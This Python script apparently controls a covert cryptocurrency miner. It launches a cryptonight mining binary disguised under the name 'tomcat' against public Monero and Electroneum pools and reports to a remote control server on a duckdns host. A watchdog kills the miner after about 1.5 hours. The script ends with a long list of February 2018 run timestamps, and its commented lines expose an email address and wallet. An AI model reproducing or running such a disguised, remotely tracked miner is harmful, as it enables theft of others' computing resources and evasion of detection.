import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:23:05.099945
#2018-02-17 17:11:01.510792
#2018-02-17 18:59:04.753993
#2018-02-17 20:47:06.331199
#2018-02-17 22:34:04.120794
#2018-02-18 00:18:07.295457
#2018-02-18 02:09:05.236395
#2018-02-18 03:57:02.095094
#2018-02-18 05:47:01.812878
#2018-02-18 07:39:03.882034
#2018-02-18 09:26:04.572165
#2018-02-18 11:11:07.168944
#2018-02-18 12:58:04.520141
#2018-02-18 14:47:05.873281
#2018-02-18 16:37:02.212472
#2018-02-18 18:26:06.945281
#2018-02-18 20:13:06.811571
#2018-02-18 21:59:06.182666
#2018-02-18 23:48:07.082246
#2018-02-19 01:34:03.620307
#2018-02-19 03:22:03.355199
#2018-02-19 05:07:04.567540
#2018-02-19 06:52:06.797858
#2018-02-19 08:41:09.038165
#2018-02-19 10:30:08.254642
#2018-02-19 12:18:07.762630
#2018-02-19 14:21:09.406420
#2018-02-19 16:09:08.022990
#2018-02-19 17:57:06.674145
#2018-02-19 19:45:13.125875
#2018-02-19 21:34:06.776815
#2018-02-19 23:20:09.008072
#2018-02-20 01:08:01.407632
#2018-02-20 02:57:03.775369
#2018-02-20 04:44:04.361212
#2018-02-20 06:28:04.801540
#2018-02-20 08:13:06.162967
#2018-02-20 09:59:05.642203
#2018-02-20 11:43:02.114764
#2018-02-20 13:31:06.847958
#2018-02-20 15:15:07.545023
#2018-02-20 17:01:06.854574
#2018-02-20 18:50:08.391026
#2018-02-20 20:41:04.227910
#2018-02-20 22:25:06.855327
#2018-02-21 00:07:06.264066
#2018-02-21 01:51:07.692396
#2018-02-21 03:42:01.427479
#2018-02-21 05:29:07.143135
#2018-02-21 07:19:06.562843
#2018-02-21 09:04:01.980778
#2018-02-21 10:52:07.203464
#2018-02-21 12:39:10.711603
#2018-02-21 14:26:04.388491
#2018-02-21 16:13:06.223468
#2018-02-21 18:03:04.513513
#2018-02-21 19:51:09.358761
#2018-02-21 21:37:06.878929
#2018-02-21 23:23:04.894392
#2018-02-22 01:12:05.723425
#2018-02-22 02:59:04.633256
#2018-02-22 04:46:07.438230
#2018-02-22 06:30:04.175849
#2018-02-22 08:18:04.246150
#2018-02-22 10:07:01.665889
#2018-02-22 11:53:05.221404
#2018-02-22 13:39:09.217165
#2018-02-22 15:28:01.455776
#2018-02-22 17:15:10.773854
#2018-02-22 19:04:01.422023
#2018-02-22 20:56:06.739065
#2018-02-22 22:42:01.480493
#2018-02-23 00:28:06.073835
#2018-02-23 02:14:07.523089
#2018-02-23 03:59:07.005761
#2018-02-23 05:44:04.492536
#2018-02-23 07:36:06.476056
#2018-02-23 09:40:10.193510
#2018-02-23 11:45:06.470724
#2018-02-23 13:35:09.969760
#2018-02-23 15:22:06.653031
#2018-02-23 17:08:06.185288
#2018-02-23 18:54:04.696724
#2018-02-23 20:42:06.035471
#2018-02-23 22:31:04.454279
#2018-02-24 00:17:06.813465
#2018-02-24 02:07:07.884403
#2018-02-24 03:57:04.187676
#2018-02-24 05:43:07.740962
#2018-02-24 07:34:05.575454
#2018-02-24 09:20:04.231792
#2018-02-24 11:14:01.441870
#2018-02-24 13:04:01.757580
#2018-02-24 14:52:05.219201
#2018-02-24 16:43:06.001130
#2018-02-24 18:32:06.802685
#2018-02-24 20:19:04.062425
#2018-02-24 22:13:05.982487
#2018-02-25 01:22:07.521388
#2018-02-25 05:15:07.960187
#2018-02-25 11:03:02.046603